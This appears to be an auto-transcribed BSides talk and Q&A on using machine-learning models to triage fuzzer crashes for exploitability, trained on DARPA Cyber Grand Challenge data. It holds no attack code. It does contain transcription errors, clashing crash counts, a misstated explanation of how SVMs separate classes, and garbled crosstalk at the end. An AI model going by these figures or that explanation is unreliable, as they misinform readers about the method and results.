exploitation. But before we get started, we'd like to say thank you to our sponsors and volunteers who help make B-Sides what it is. And specifically, we'd like to thank Cylance, Microsoft, Robinhood, and the Paranoids. So take it away, guys. Thank you. Okay. Good afternoon everyone and welcome to our talk. We hope that this slot will not get you too drowsy. Everybody had something to drink after lunch or feel a bit more awake and we'll try to make this, if not entertaining, at least plausible in a sense. Before we begin, there's a lengthy disclaimer that you're all required to read and sign off on. That's it. No, no, no. In all seriousness, I used to work for Intel, not any longer, which is why

you can see me crossed out at the bottom, and why I can make this joke and say you don't really have to read this anymore. But please, please read because I still work for a Fortune 50 company. Someone has to. My name is Guy and this is Ezra. We're both co-organizers of the Tel Aviv B-Sides, which happens around June and you're all very welcome to join us in sunny Tel Aviv. It's a pretty awesome B-Side, just like here. And we go and often talk about topics that cross both of our domains of expertise, with this talk being one of them. We do have some experience and we travel the world to some of the finest

conference out there. We both believe that Bistar El-Savir is one of our most lovable, best conferences we love to attend, love to speak at, because this is the one that's most homey, most approachable, most community driven. And this is something I wanted to point out. Before we begin, a bit of a history about how we came about to this topic and about the talk that we're going to do today. Because it's funny, you remember we were maybe a year ago? About a year ago, yeah. and we had a couple of days in san francisco and we were driving our car our rental car and we're like wow this year we have some very good content

and we were like we were talking about machine learning and we have some amazing experiences and it was like what are we going to do next year So last year we did a talk here in this very same room about machine learning and how you would hack machine learning. And we were trying to think about, okay, this is a good topic, this is something interesting which we both like. What can we do with it next? What's the next step? And that next step and that conversation led us here today, which is how can we actually use machine learning to help us in our everyday life, in our jobs, of actually finding and exploiting issues in

various systems that we explore. So let me start with our problem and how it is related to our last year talk. Last year, our objective was to hack the hell out of machine learning. And when I'm talking about that, I'm not talking only about the algorithmical part and the adversarial networks. I'm also talking about finding vulnerabilities in the different frameworks that exist for different machine learning purposes. So we did what we researchers love to do the most, and it's basically run a fuzzer. And this fuzzer started to generate thousands of crashes to analyze. And you can imagine that this is a good problem to have. Having a lot of crashes is good, but having a lot

of crashes brings us a small issue. Not all of those crashes are exploitable. automation can do some good work but we may miss some things. I mean, using heuristic approaches to find which of our crashes with GDPR exploitable works but we may miss a lot of interesting stuff. On the other side, doing it manually is extremely expensive. me as a researcher and my team of researchers can only go through a small amount of crashes. Like imagine for every single crash we need to reproduce, we need to open our GDB debugger and we need to take a look at the entire flow to know if it was exploitable or not. And well, this doesn't scale at all. And when

we saw that it doesn't scale, we thought that our work would be mostly about building the model because we had the crashes and we thought, well, we are going to be working a lot on building this model. And then we saw that the real problem was starting to gather the data. Because imagine now that we have thousands of crashes But we don't even know what's their status. We don't know if they're good crashes, bad crashes, the same crashes. We don't know anything about them. So gathering data became a big problem. And then, then we struck the real problem, which is gathering good data. Because there's a big difference between data and good data. Like if I have 10,000

crashes that all of them are going through the exact same path. It's the same as having a single crash. It's not relevant for me at all. So this was the problem. Finding what is the good data. Finding how we can sift through different crashes and try to understand how we can leverage them. So our problem statement became something like this. Can we, as researchers, generate a machine learning model that can help us with the crash, crashes, help us find exploitable ones? And again, remember that our problem burned with thousands of AFL crashes.

So, to summarize that and kind of like put the focus, put the spotlight on our problem is we have a team of researchers. In this case, my team had about five researchers. Five researchers can go through, I don't know, maybe 10 to 20 crashes a day in a very good day. We have 10,000 crashes. This does not scale. This is not the solution. And more than that, in order to look at those 10,000 crashes, usually you'll see a lot of crashes that are duplicates of each other. And that means you're wasting a lot of time in finding out that they are duplicates of each other. So the big question is, can we use machines to

help us sort out the exploitable paths or the exploitable crashes that we actually want to look at and invest the time and resources that we have into where we can actually drive impact. So that was the big research question. And the way we try to tackle it is to see if we can build a machine learning model that would outperform, would actually be better than the best known alternative, which is an open source project, which is called Exploitable. Because the name is so confusing, I've underlined it. And every time that I will refer to open source project and it says exploitable with an underline, I mean the open source project. And I say exploitable another way means it's just exploitable. So this talk will not... show you how to

exploit the next zero day. This talk will not be releasing new tools and methods in order to exploit something new that you haven't seen before. But what we are going to show you in this talk is how to utilize, how to build such machine learning models and see where they can help you and where they cannot and try to differentiate between the two cases and walk you through the research path that led us from an idea to something that actually works and the hiccups that we found along the way. We do want to say beforehand we really can't trust our results and we'll explain in the end why we can't trust the results. But you

should always keep a very specific eye on the details because the details are what really, really matters. So we'll be happy to expand after the talk if someone has specific questions or issues. So, I'm not going to do this 101 into machine learning, what it is, but I'm going to give you a very high-level overview of how machine learning actually works. So, machine learning has a couple of different paths when you're building a machine learning model or running a machine learning model. The first step is that you have to give it the data, and in order to give it the data, you have to collect the data from whatever sources you get your data from,

and then you have to... extract from that data the pieces of information that you want your machine learning model to look at. For example, if you're looking at the log file, a log file is a large piece of data, maybe, I don't know, one million log lines. But the machine learning is not really reading one million log lines. You have to extract from each line the specific items that you want the machine learning to look at. The timestamp, the host name, the alert level, the stuff that you want it to actually look at. This is called feature extraction. So we have the data, and we have to filter out the specific pieces of information that

you want to look at. And then we provide the model with that information and the model will go through an iterative phase where it will train on that pieces of information and will actually fit the model to the information that it saw. And this is a very important distinction to make. When a machine learning learns something, it learns on basis of stuff that it had seen. It does not learn on stuff that it has never seen before. Therefore, when you are hearing someone saying, "I have a machine learning model. I trained it on dataset A. It's now capable to find out anything and everywhere in the world," it's probably not true. Keep an eye on

the details. The last point is that after the model has already learned the information, it internalized that information, the next level is to make predictions. So if I have a machine learning model that learns how to distinguish between cats and dogs, so it learns about a lot of features of cats and dogs, and now I can give it an image that it has never seen before, and it will give me a prediction. Is it a cat or is it a dog? And the way that it works, it will say, "Okay, I've never seen this picture before, but it looks very similar to all of the pictures of cats that I've seen before, though this is

probably a cat." And the prediction would be something like, "This is a cat, 0.7 probability." Okay? So this is how machine learning usually works. Machine learning is not magical. I know some people think it is. It's not. It's not magical. It's not difficult. It's not complex. At least when you're starting out and then you make a lot of fine tuning and nuance and stuff like that. In the end, you can think about it. There used to be a show. What was the name of the incredible, the mystery machine, the Scooby-Doo. And at the end of each show, they would go up to the villain and they will unmask him and show, ah, it was you

all along, you meddling kids. Whenever someone says AI or machine learning, turn off the hood, you'll see that it's linear regression. Okay, so it's not difficult. It's not complex but in the end it's a tool that fits some sort of problems and does not fit other types of problems and It's a very good buzzword just like other buzzwords we all like like blockchain and cyber and zero trust and stuff like that So it's very good to keep it in your talks and general rule of thumb is it's machine learning if you see code it's AI if you see presentation keep an eye on the details and So, we'll give you an example. When you write a talk and you submit to a conference, you don't say you're

doing machine learning talk, you are hacking AI. You get much more acceptance rate that way. But in the end, everybody that says AI really means machine learning. Or statistics. Or linear regression. Or heuristics. In the end, it all comes down to the same thing. So, it's not that we're not on board the hype train, just that we have a different look from the inside. So, what is machine learning good for? If I already described all the stuff that it isn't. It's very good at finding patterns. And we, as researchers, trying to find patterns, it's a good tool to have in our arsenal. Because if I need to scan one million log lines to find some patterns, obviously I'm not going to do it manually, having it run on my

screen, trying to catch this something is misformatted. I'll give it to a tool who will do graph and find it much better than myself. The same way machine learning can find patterns where us as humans can't really see those patterns. Another thing that machine learning is very good at is looking at variable A, variable B, and variable C, and say these variables correlate together in some sort of way. And if you can look at that information, sometimes you can find new links, new opportunities that you haven't thought about before. So if you fit the right information and you find the right correlations, you can learn something new about your data set that you didn't know beforehand. And in the end, something that you can do with machine

learning, it's a bit difficult to do with a bash script, you can abstract a problem, throw it at machine learning, and see if something comes out the other end. And if something does come out the other end, it means that there's some sort of structured information there that the machine learning was able to catch on to, which means that you can catch on to, which means that you found something new that you didn't know before. And this is kind of what we were going for here. We knew how to find exploitable patterns in code, We didn't know how to write programs that will find exploitable patterns in code. So we just abstracted the problem away

and called it machine learning and said, "Look, this is something that is exploitable. I know it's exploitable. You find out why and tell me." So this is what we tried to achieve. We wanted a system that we will give it some input and it will tell us this is exploitable and why. Okay. Part of the problem is that machine learning is given predictions based on information that it has seen in the past. So if I give it some sort of a new exploitable path that it has never seen before, it will not be really able to tell me that this is exploitable. And this is something that we kind of took into account. So, okay, there are 80% of the exploits out in the world come out of

the same root causes. So if you train the machine to find these root causes, we will cover 80% of the world. And the other 20% of the world is something that we've never seen before and requires manual work, and we might miss it with this system. And you know what? That's fine. That's perfectly fine. Because if I can go over 10,000 crashes and throw away 8,000 of them because they're all the same thing, I saved a lot of time. I saved a lot of resources. And I'm very happy with that result. What we try to do is to create this dataset, test it, validate it, and to make sure that we actually have a working, I won't call it product, but at least a tool.

A tool that you can use in order to better facilitate your research activities. In order to do so, we first have to teach or understand what a crash is. to the machine, what it needs to focus on, and how we would go about describing those issues. So, before we start describing what the machine does, we'll start with what a human does. And with that, Ezran. So, I'm going to tell you a little bit about my life. I love speaking about my life. Particularly, my morning life. Or how I like to call it, when I arrive to the office. But actually, when I arrive to the office, it starts with The night before. The night before, I set up some of my fuzzers to run

on certain applications and started running in the background. I went home because I'm lazy and I need sleep. The next morning, I arrived to the office extremely early, around 11 o'clock, and I drank my first cup of coffee because if not, I cannot continue. Afterwards, I started seeing what were the results of that fuzzing session. I open the debugger, I load into GDB the core logs from the crashes, and I start to analyze based on my experience, based on what I had seen before, based on the paths that I had seen before, and the way I had analyzed crashes in the past, I classify those crashes with either a potential to be exploitable or not

And afterwards the real fun starts, which is developing a proof of concept tool for the crash and trying to actually exploit it. The fun part of my day, week, year, whatever. We have seen until now, we have talked until now, this is like a classical data problem. Because I have multiple crashes based on experience, expect a result with a certain degree of probability. So if we are doing with machine learning, the machine learnings do not need sleep, nor coffee, which is probably they will start a revolution eventually. The pre-processing phase is the same thing as me opening it with a debugger and extracting the different registers and the different data that I need to perform my work. And then the

machine learning analyzes the data by the same experience like I have. We train the model to learn from old stuff, from experience. We manage to transfer this knowledge and it meets the same predictions. And afterwards it will probably return to me to develop the proof of concept. We are still not on a place where the machine learning will be able to generate the payload that will generate a nice, exploitive proof of concept.

So in order to train our model, the first thing that we needed is something that will teach experience or to give it experience. And we looked about the internet, we looked about our office, we looked about our friends, and we asked everyone, do you have like a very good data set of a couple of exploitable crashes that you know what is the exploitable path in them? So you know that this program crashed, and you know that if you will use this payload, you will get a buffer overload in this address. And the answer was, yeah, I have lots of crashes. But no, I don't really know if it's exploitable or not. So the peak problem

was not that we weren't able to get data. We wanted good data. We wanted data that we will know that it's either really exploitable or that someone took a look at it and it's not exploitable. Because all of the other pieces of data, which is, yeah, it might be exploitable, it might not be exploitable, doesn't really help us teach the machine anything. OK. Sorry. So we searched about, we talked to people, and finally we stumbled upon DARPA's Grand Cyber Challenge. And the reason that this really came as a huge bonus for us is because they've already done all of that work for us for that competition. So I will not go into details what the

Darbar CyberGround challenge was. However, what they do provide is they provide 632 different exploitable crashes that come with a nice little wiki that says exactly for each and every binary what kind of exploitation technique you can use against that binary. And they already wrote the exploits. So now we have a data set where we know for each and every binary in that data set that it is exploitable. and we know how exactly it's exploitable. So now we have something that we can use to teach the machine. So we took that data set and we ran it through that open source exploitable and the open source told us that out of that 632 cases, 607 are

definitely exploitable, 12 are probably exploitable, and it didn't have an answer regarding the other 13. So, this is our baseline. That means we know that all 632 are really, really exploitable, and the open source package only found 607 to be exploitable. So, this is the baseline that we are going to measure ourselves against. Can we do better than that? In order to do that, we looked at what kind of information we can use, and we have tons of information. We can look at the registers, we can look at the addresses, at the stack itself, we can look at the heap, we can look at the control flow information, we can look at a lot of different pieces of information. And after we analyzed a lot of that, we said,

Screw it. We don't know. We'll just take something simple, see if it works. And if it doesn't work, we'll make it more complex. But let's start small. So we started with just the regular registers, the EIX, EBEX, pointers, and segment registers, stuff like that. So our first step, we'll take the crash dump. Then we extracted the registers from the crash dump. And we fed those registers for each crash. We fed it to the machine learning to teach it something. And we'll talk a bit about how we taught the machine. So, we created a pipeline that just ran the binary. The binary crashed. We captured the crash logs, the crash dump. We analyzed the crash dump

and we took that crash dump and forked it into two different processes. The first one took it and ran it against exploitable and the other against the machine learning under test. Okay? So we can compare those results. And then we hit a problem. We hit a lot of problems. This is the first one I'm going to describe. And maybe someone can see the problem right from this graph. This graph is just showing the value histogram. Sorry, not histogram. The value spread for the ECX register. And what you can see here, that if you look at the value of the ECX register over the 632 different runs of the program, of the different programs, you see A lot of times it's a very low value. Sometimes it's

a high value. And not often it's somewhere in between. But that means is that most of the time when we are running this and we get a crash, we'll either have a very low value or a very high value. So what does low value and high value mean here? A register holds a piece of information. The ECX register usually holds either one of two types of information. Either it's a value for computation, like 1+1, 2+3, usually it's a very low value, or it's an address. An address is usually something which is very large, because the way of the address is structured if you translate into an integer value. So either the ECX is holding an

address, or either the ECX is holding a value. So that's kind of what you see in this graph. And these two cases are dramatically not the same. Because if I have a crash and E6 was holding an address, this is something interesting of type 1. And if we hide the crash and it had only a value like 5, it's interesting, but of a wholly different degree. So we needed a method, a way to differentiate between the two cases. Because when we try to teach the machine learning model this, It just got really, really confused because it didn't know how to differentiate them. So what did we do? So there are a couple of different techniques of how to circumvent this problem. The technique that we finally decided to

go with is something called binning. Binning is to take your value space and just chop it up into blocks. You can do it uniformly or you can do it un-uniformly. But in the end, we just took the easiest route. We are lazy, as Ezra mentioned. And we took the entire range and split it into 10 different blocks. And then most of our values either fell in the first block or in the last block. And very uncommonly, some are in the blocks in between. But once we did that, And we could teach the machine that says, OK, if you see something in the first block, this is type A. And if you see something in the

high block, this is type B. It made it much easier for the machine to understand and actually analyzing the value of the ECX register in each machine. Because we don't really care about the value. We just cared about the different cases.

So, the first machine learning model that we tried to use, maybe a small introduction for that. Usually when people are discussing machine learning, they mean a very specific type of machine learning, and that is the neural networks. This is like the most common case. Neural networks is great, but we obviously couldn't use it. And I say obviously because it's really not obvious. So one of the things that I said you really need to mind the details is that in order to use any type of machine learning or more advanced models, you have to tell it something about the good cases, but also about the bad cases. So you have to teach it like a crash

that is exploitable, but also teach about a crash that is not exploitable. And this is a big problem because we have a big data set. Well, not that big, but pretty big data set, 632 crashes that we know that they are exploitable. But we don't really have the other kind. We don't have a crash that we analyze and we know for certain that it's not exploitable. And this is also a very tough cookie because in order to validate that some crash is not exploitable, you still need to invest time and effort and resources to analyze it, to have someone sign off of it and say, "No, this is not exploitable." And usually it comes with

a mild guarantee. I don't think I can exploit this. Maybe it's exploitable by someone else. So we can't really know if something is not exploitable. We know when it is exploitable because we know how to exploit it. But we are not really sure if it's not exploitable by the mere fact that we didn't find a way to exploit it. It's not the same thing. So what we chose to do is to go into a different branch of machine learning algorithms. They take a single class. A single class algorithm just says that you only know one thing about the problem. You don't have a lot of types of information about the problem. So what we do

here is we know all of our data set actually fits into the same class. We know it's exploitable. Remember, we have the wiki. And now we will use these types of machine learning algorithms in order to teach it something that we already know. So the first type of algorithm is called the one-class SVM or one-class support vector machines. And very hand-wavingly, I will explain how it works. So imagine we have these black spots and these white spots, and we are trying to find a line that will separate the two groups from one another. Okay, this is what the machine learning does. It will try to find the right equation for this line, the right parameters

for the equation for this line, that will give us the best separation between the white dots and the black dots. So the green one, here it's marked H1, is a very bad separation. We all see it's a very bad separation because it doesn't really separate them. So what the machine learning algorithm will do, it will change the parameters and we skew it a bit. Now we have H2, the blue line. So this is a good separation because all the black points are on one side and all of the white points are on another side. But mathematically speaking, it's not the best separation that we can get because if we keep changing it until we have

H3, this is the red line, the average distance of each spot from the line will be the smallest for the red line versus the blue line. So what I'm trying to say here, that even though the blue line is a good separation, it's not the best we can do. So usually what we do with machine learning algorithms, we're trying to find the optimal separation between these two classes, two groups of information. So this is what we did with SVM. And just to reiterate what we know, we know that the entire 632 points are all exploitable, but we took only 609 of them. those that are exploitable, the open source found to be exploitable, and we

use this as our common base. We taught the SVM that, look, all of these points belong into the same group. Now, check out the rest of the points and tell me, do they belong to that group or not? So you can imagine it like this. We took those groups, we clustered them together, and now for each new group that I'm adding, I can calculate the distance between that new group, between this new sample and the group that I had from before. And if it's close to the cluster, it's exploitable. And if it's far away from the cluster, it means that it's not exploitable. So this is what we've done. And we got pretty good results.

From those 23 records that exploitable wasn't sure or didn't know about, 23 of them we found to be exploitable and two more were probably exploitable. So we really outperformed the open source package. Just by looking at the same pieces of data from a different perspective. And that wasn't enough. We wanted to test a couple of other algorithms to see at least the lay of the land. Can we find a better algorithm, something more robust? Again, we really wanted to increase our own trust in the model because we don't really trust it. So another model is called cosine similarity. Cosine similarity just means that we are going to measure the cosine of the distance between two points. So

here in this graph, we have two points, a burger and a sandwich. Obviously, they are kind of the same class, but not really the same thing. Is burger a sandwich? I'm not sure if it translates well to English. I don't think that burger is a sandwich. And then we calculate the cosine difference between them. And if you're very, very interested, here's the formula. You don't really need it. And we looked at that model and we used it to calculate the distance.

And we got other results. And here, we got 16 more samples to be exploitable. We're still outperforming the open source package, but we are not outperforming it by much. And then we changed the model from linear cosine similarity to centroid cosine similarity. I know it sounds scary, but all it means is that instead of looking at the distance as a straight line, we are looking at it as a sphere and its spherical distance between points. So when we change that algorithm, suddenly we can cluster more points together just by looking at how far away are those points on a sphere versus how far away are they in a straight line. Again, we outperformed the open source package by a significant amount. We also played with how many

registers we are feeding into the machine learning to see do we really need all of those registers to get those results. And we started with nine registers and we got 65%, which is good. And we upped it to 15 registers. Now we got 87%. So we fed it more information that it had previously and we got better results. Not very surprising. The last model is called XGBoost. XGBoost is something that's probably the most similar to neural networks, which people are very familiar with. And that is we took 80% of the data, we used it for training, and we kept the other 20% for test and validation. And that is actually not very useful. It's useful

just in one parameter. we found out that we have between 95 to 99% accuracy for this type of phone for XG boost. It means, sorry. Yeah, it was bullshit. So we looked at that and said, okay, we have 99% success rates for this. It just doesn't make sense. And then we looked at the data and we found out that we were pretty much lying to ourselves most of the time. Because if we looked at the data, remember we had 632 crashes, out of them 609 we all agreed that were exploitable. And that means if we only guessed exploitable, we will be correct 96% of the times. which mainly means that there's no randomness involved. There's nothing to learn. If I ask

my three-year-old son to just keep saying no, no, no, no, he would be correct some of the times. Really? we didn't really learn anything useful. However, XGBoost does give us something else. And this is called the decision tree. And the decision tree, what it does, it takes each parameter that XGBoost is basing its decision on it and puts it into a tree structure. And that way you can visualize which parameters were more important to make decisions on XGBoost. And that gives you insight into the parameters that have the most impact in your dataset. Which registers are more important than others? Which data points are more interesting to look at than others? So just to walk you through it. If you're looking at EBP, again, is EBP

in bin 1? Assume that it is. Is ESI in bin 1? Assume that it is. Is ES6 in bin 1? Yes, it is. Then we have 16 records that fit this filtering criteria. Out of them, 7 are exploitable, 4 are probably exploitable, and 5 are unknown. So this gives you an insight into the way that the data is structured. So let's look at it in a different way. EBP is not in bin one and ESP is not in bin two. If that is true, then 571 records are exploitable, which means that now we have a very good rule of thumb. We'll just look at the crash and if EBP is not in bin one and

ESP is not in bin two, we now know it's exploitable. Success. Now we can profit. Ezra so eloquently put it before, bullshit. This means absolutely nothing because that's the way that the data is structured for those samples and we use the model that needs to have input about the other completing side of the information which is what does a non-exploitable path look like? Which it never saw, it didn't know, it didn't train on any unexploitable path because we don't have that data. And that means that even though we have that decision tree, it didn't really teach us something useful. And this is something else that you have to really keep your eye on the details here. When someone gives you information statistics out of those machine learning models,

Statistics are great and they really describe the way that that machine learning model was ran and trained on, but it does not give you any kind of insight what was the data it was training on. So if you don't know what the training data was, what was statistical properties, anything on it, looking at the results out of context, you just get that, results out of context. Just like I got a 99% success rate. It means absolutely nothing. To conclude this experiment or this journey that we took with machine learning is that, yes, we can take the same kind of samples and compete against exploitable open source package, and we can outperform the open source package. But the open source package knows how to deal with instances from the real

world. Our machine learning model has no idea about the real world. It just knows those 632 samples that it saw. If we try to fit it new information, new pieces of information never saw before, will these hold true? Will this still find stuff to be exploitable when it isn't or when it is? We actually don't know. We don't have enough information to make those decisions. And we believe, we have at least a gut feeling that this is true, which means that if we You can think about the open source package as a set of heuristics that describe a set of rules that if you follow those rules, you will know that something is exploitable or not. Machine learning does the same thing. It describes another set of rules that

if you follow them, something will be exploitable or not. What we're trying to say here is that our model is probably not well trained enough to be useful in a real world scenario. But if someone wants to take it and train it or take a different path and train it, he will still probably get very good results, probably better results than the open source package. So in order to build this yourself, you can do it. You don't need a mathematical background. You don't need a data science background, which is a common misconception. In order to build machine learning models, you need probably to know Python. In order to write new machine learning algorithms, you probably

need a PhD. It's not the same thing. So don't be afraid. Go ahead, pick out your favorite data science package, talk to your favorite data scientist and ask some advice and build it. It's not that difficult. It's not that hard. It probably burns some CPU hours and that's it. You will have some results. You'll need experience to interpret them. But the way that we gain experience is by hacking things together and trying them out. And if you want our white paper, the white paper describes everything that we've discussed, but also gives you references and tools that we've used. I'll step aside. Okay. So in conclusion, machine learning in the end is very good at finding patterns that humans are not very good at finding them.

It's very good at matching different variables together and finding correlations between them. And it's very good in misleading us into interpreting the wrong results. So you have to be very careful when you do that. But if you are careful when you do that, you can get good results. I'm not dissing machine learning. I'm just saying use it with caution. In the end, we don't have enough non-exploitable crashes in order to fully train our model, which is As we've said in the beginning, the biggest problem is getting good data. And this is the biggest problem for anyone who's playing in the data science field, which is also the reason why the biggest players are people who

have access to lots of data, such as Facebook, Google, Amazon. Everyone else has access to huge amounts of data, will have the best machine learning model. Imagine that it actually worked and it was open sourced and you can use it and it would fit any kind of problem in the world. What could you use this for? So we thought about three main use cases, out of which one was very interesting to us, but we think that it might be interesting for others. So the first one would be, imagine that you had a system that would look at a crash and tell you if it's exploitable or not. a high degree of confidence. And that means if you hook it up into your favorite bug tracker, you can very

easily talk to your developers and say, reprioritize your bugs because these bugs are exploitable and these bugs are not. And it's a new way to look at prioritization for bugs, at least from a security perspective. Because if we could fix all of those exploitable bugs first, our attack surface would be closed much faster. The second area, which was very interesting for us, is for vulnerability hunters. Take those 10,000 crashes, throw 99,000 of them, sorry, 9,900 of them in the garbage, remain 100, just look at 100. It's much better for a vulnerability hunter to focus his attention on somewhere where there is a bigger expectation to actually have some yield. And the last opportunity is actually to improve fuzzers. The basic

job of a fuzzer is to find some sort of input that will crash the problem, the program. But a smart fuzzer will not just crash the program, it will crash the program and will give you those inputs that give you something that you can use those crashes for. Because if it just crashes the program and nothing happens and you can't use it for nothing, it's not an interesting crash. Okay? So, to wrap this up. Even though data science has the word science in its name, it's more an art than a science. Talk to anyone with a PhD in the field, and you will agree with me. And in the end, we can learn a lot

and we can use a lot from other disciplines. So we had a data scientist in our team and that helped us look at those data problems from a new perspective, from a new angle that we haven't considered before. And it actually led us into this path to find out that we can improve the way that we look at things. We can improve the way that we are doing our day-to-day jobs and save money and save time and resources. So we would like to acknowledge Dennis, who's the PhD on our team, on my previous team, that did this work on the machine learning side, and both Ezra and myself on the binary exploitation side of the matter. The people behind the exploitable open source package, which is amazing, and

if you're in the field, you're probably already aware of it. And the people behind the Cyber Grand Challenge, which obviously, without that data set, we wouldn't be here today. So, thank you all of them, and thank you, and yeah, you can. And we have time for questions. Please, don't be shy. They don't have questions, they are running away. Yeah? - Are we at a point where SOC analysts or those aspiring to be a SOC analyst should actually become data scientists? - The question was, you probably all heard of them with the microphone. It's a tough question. A data scientist is usually someone who has a very deep familiarity with the algorithmic side of machine learning.

When you're in a SOC, you're not interested in the performance of the algorithm, developing new algorithms. You're actually interested in applying those algorithms. So I would say someone in a SOC doesn't need to be a data scientist, but he should be a data analyst at least. And that should be at least know how to run queries against any kind of language, SQL, whatever you can imagine. It will make you a better analyst. but also understanding the way the data is structured will help him improve his queries and that means he is already on the path to being a data analyst. Yeah, more questions please. No, behind him. Thank you. Basically because most of the techniques you've used actually do keep the

interpretability of the features they found important. Is that one of the things that you actually took away from that whole process to maybe develop further techniques of detecting exploitable crashes? Yeah. So we looked at it and we tried to find out... Well, let me rephrase this and maybe answer the same question, I hope. Looking at all of the crashes that we looked at and the machine learning models that we developed, it looked like the pieces of information, features that we look at them, will have a higher probability to know if something is exploitable or not. So this is part of the reason that we did this research, because instead of looking at the entire data that we can look at a crash, if

we could just focus on a specific slice of data from that crash, it would make our job easier. So the shorter answer is yes, you can. The larger answer, no, it doesn't hold up in the real world. And the reason for that is that the machine learning models that we trained gave us information about the information that they saw. So they were very good at focusing your attention with results that are relevant for these 632 test cases. But once we took that same models and put them in something new that they've never seen before, it would skew. However, if we had like 1 million test cases covering real world use cases, we could probably have

better insight and we'll get a different focus. And that focus will be probably more true for a broader sense of cases. Let me expand a little bit in this. There's a second important thing here. In this particular kind of machine learning, we are not so concerned about mis-accuracy, misrepresentation, because our objective is to find and exploitable bugs and we have the assumption that there are multiple of them. So if we miss one of them, it's not that bad as in traditional defensive machine learning. Does it make sense? - Do you have any ideas about how to expand your data set? Or maybe crowdsourcing something from people who are vulnerability researchers, something like that? So we have some ideas and we actually do

ask every time we give a talk like this, people if they have information please share it with us. The problem is that most of the people that have that information cannot share it with other people. So if we talk to like a large vendor, I don't know, Sentinel One, Silence, Carbon Black, whoever, who have access to those data points, they can't share those data points with us, both from legal perspective, business perspective and others. it's floating out there, usually you can't really touch it. It's part of the problem of getting good data. So if someone has a very brilliant idea of how to go about that, we would love to hear it. That's really the

reason why we are sharing our methodology. You are probably smarter than us and have more resources than us. Somebody in the audience will get it. To build from this and make something way better. It looks like you were mainly doing memory register fuzzing. What libraries and modules were you using to do that? For the fuzzing, which libraries and modules did you use for the memory fuzzing? Well, we were using AFL. Maybe I'll explain for a different-- we didn't do specifically memory fuzzing. What we've done is use AFL to find a crash. When we found the crash, we configured the Linux backend to save the crash dump. And then we had a Python script running, analyzing the crash dump and extracting the information that we cared about.

At this point, we cared about registers. But we actually had a trove of information to look at, which we didn't. We just looked at the registers because that's the decision that we've made. It's not a necessity. So my question is this. So in the data science world, they're always talking about how much data do you need to actually create a viable model. And he talked about the-- and you've talked about the limitations of the data set you can get. How much data do you need to get a viable model? It's actually a big open question, the relationship between the amount of data that you need versus the accuracy of the model that you're trying to build. So there is a graph, which I can't show because I

don't have it here, but it looks something like this. It means it's a nonlinear graph. It means that in the beginning when you're building your model you need more high accuracy data and less of it and as your Accuracy increases when you're fine-tuning your model you have more accuracy You will need more data and as you will increase the amounts of data your accuracy will drop but the model will be more robust so There is a cutoff point where you give it more data, you don't get much improvement in your accuracy, and you're just waiting time and resources to do that. But most of the problem is getting to that point. And if someone already

has more data than that point, usually he doesn't care about the question. He just has lots of data. For everyone else, if you can get into, let's say, a 60% accurate model with a fixed amount of data, and in order to get into 70% accuracy, you'd have to double the amount of data, you will usually stop because getting data is very expensive. So this might be for the room as well. There's a group, I think they're called Language Theoretic. Does that sound familiar? Mindset. Langsec, yeah. So those guys. If I'm remembering right, they've done some research on classes of bugs. Basically, I'll write an input parser for random input, it'll be bad, and that's where a large class of problems

come from. If you start out and build a solid finite state machine that recognizes good input and bad input and all of that, So they may have some good information on non-exploitable good parsers. Thank you, first of all. The second thing is that I agree, but there's a caveat to that. And that is that when we are discussing inputs to the machine, we don't necessarily mean something that gets parsed by a parser. Inputs come in various forms. And it kind of hides because it's not obvious when we say inputs. Inputs, for example, is the way that the stack is structured before you call a function. It's an input to that function. However, it's not something that's user controllable in a way. So it's not like you

entered your name in text field and then a bug occurred and a crash happened. Sometimes it happens because you reordered the parameters or you gave the wrong length of a parameter or something like that, which would cause the crash, but not necessarily something that a parser even gets to look at through that exploitation path. So I fully agree that better sanitation will give better security. That is... Of course. However, I'm not sure how deep bugs this kind of approach will actually find or stop. I agree. I'm just saying that the problem is larger than that. Yeah. So one of my questions was, you had like this three stage validation thing where you were checking the contents of the pointer, the index, and then the contents of

the ECX register, I believe. Now, are you actually checking what's in the actual region of memory to validate that it's the same data overflowing the same section of memory? Or is it that you're looking at the debug logs that you were talking about? The answer to that is yes and no. We are looking at the specific values in the sense that we are analyzing them to read them, but we don't care about them and we are binning them, meaning that if they are between range A and B, they're all belonging to bin 1. So we don't care about the values. The other thing is that we are not looking at the crash logs. We are

actually looking at the memory dump. So we get the actual register values. So this is the information that the model is basing its decisions on. Yeah. Any more questions, please? Just ask between you and the happy hour. So I don't remember the presentation I saw it in, but I think someone hypothesized that AI is better at defending as opposed to adversarial types of tasks, and you were looking at exploitables. Do you agree with that hypothesis that AI is better at? I'll have to look at the formulation of that hypothesis to either agree or disagree. I would say that we have some experience with the adversarial side for machine learning. We actually gave a talk right here in this room last

year about that. There are some stuff that machine learning is better at. There's some stuff that it's horrendously bad at. Adversarial analysis, for example, is something that machine learning is very bad at, just from the problem that, just from the reason that the problem space is so much larger than the solution space. So there's so many other inputs that could lead into the same output for machine learning. And that means that you can easily trick machine learning to do, to misclassify an input, to make the wrong decisions, etc. However, in that sense, machine learning is much better at defending because if as a defender you can create like a white listing set of rules and

you can teach the machine learning those rules, it would be much better than you enforcing those rules on a specific data set. However, that's not the way that it's usually applied. Maybe some security products do pattern matching, trying to do anomaly detection, stuff like that. Machine learning is much better than humans. It's not very good. It's not the same thing. Because we need to remember that we use it multiple times. Machine learning is as good as the experience it has. And for defending it, we'll only be able to defend what it has, a new kind of stuff. Just to give you an example, give you the rule of thumb here. Someone knows how often does Facebook update its machine learning models? How often? So the answer to that, that

they reanalyze their data and update the parameters for their models on a couple of hours cadence. So, they re-learn, re-teach the machine learning models that they have every couple of hours based on the new data that they received from the users. And that means that they have like a moving target machine learning model. Because if they kept the session learning model, it would drift away from what the users are doing very, very fast. Which is another problem with machine learning, which we haven't discussed here at all. It kind of answers that problem. Yeah. Thank you all. If you have any more questions we're going to stay right here. Thank you. Thank you. - It's the

ball being dropped.

Thank you.

Okay.

Yes, sure. At what time do we drink? Yeah.

- you will learn it better to actually find those so that's the good thing about it so that's the other thing so we have to reach out to people that prefer those more heads-on information so when Sean and I spoke we both grew up in a small space we were happy we were all proud of where we go I don't know why it's such a big deal but something happened - um What? um also I would say no. Just, you know, it's true. I do know. Moral of the question is that there are shorter time goals than you have around this. They need to let go of the challenge. I know that's true. It's something

